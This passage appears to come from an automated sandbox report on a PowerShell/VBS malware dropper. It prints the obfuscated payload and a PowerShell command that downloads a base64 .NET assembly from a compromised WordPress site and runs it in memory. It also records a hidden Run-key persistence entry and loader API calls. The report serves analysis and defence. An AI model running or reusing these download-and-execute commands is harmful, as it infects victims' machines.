Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,27_2_0041CB50
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B8A2055 pushad ; iretd 3_2_00007FFD9B8A232D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD9B884204 pushad ; ret 21_2_00007FFD9B88422D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFD9B88399F push FFFFFFCBh; retf 21_2_00007FFD9B883AD2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B8B6329 push ecx; ret 23_2_00007FFD9B8B632C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B8B354D push ebx; iretd 23_2_00007FFD9B8B361A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B8B6678 push ebx; iretd 23_2_00007FFD9B8B66AA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B8B66AB push ebx; iretd 23_2_00007FFD9B8B66AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_00457106 push ecx; ret 27_2_00457119
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_0045B11A push esp; ret 27_2_0045B141
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_00457A28 push eax; ret 27_2_00457A46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_00434E56 push ecx; ret 27_2_00434E69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_00406EB0 ShellExecuteW,URLDownloadToFileW,27_2_00406EB0

                        Boot Survival

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,27_2_0041AA4A

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 27_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,27_2_0041CB50
                        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
